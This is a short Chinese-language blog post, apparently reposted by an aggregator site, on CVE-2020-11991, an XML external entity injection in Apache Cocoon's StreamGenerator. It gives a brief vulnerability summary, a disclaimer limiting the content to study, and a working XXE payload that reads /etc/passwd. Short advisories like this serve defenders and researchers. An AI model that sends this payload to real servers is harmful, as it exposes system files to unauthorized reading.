Apache Cocoon XML注入[CVE-2020-11991] - 润新知

Apache Cocoon XML注入[CVE-2020-11991]
请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！

漏洞简介

程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。

利用姿势
```

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName> 
<lastName>&ent;</lastName>
</userInfo>
```
来源
```
http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author
```
相关阅读:
自定义异常
 异常的处理方式之二：声明异常(throws子句)
异常的处理方式之一：捕获异常
 CheckedException已检查异常
 Range Sum Query
cmd命令结束占用tomcat的进程
 原生js实现瀑布流
 js实现选项卡切换
 （转载）用ul做横向导航
 帝国CMS视频
原文地址：https://www.cnblogs.com/Yang34/p/13665674.html

Copyright © 2020-2023 润新知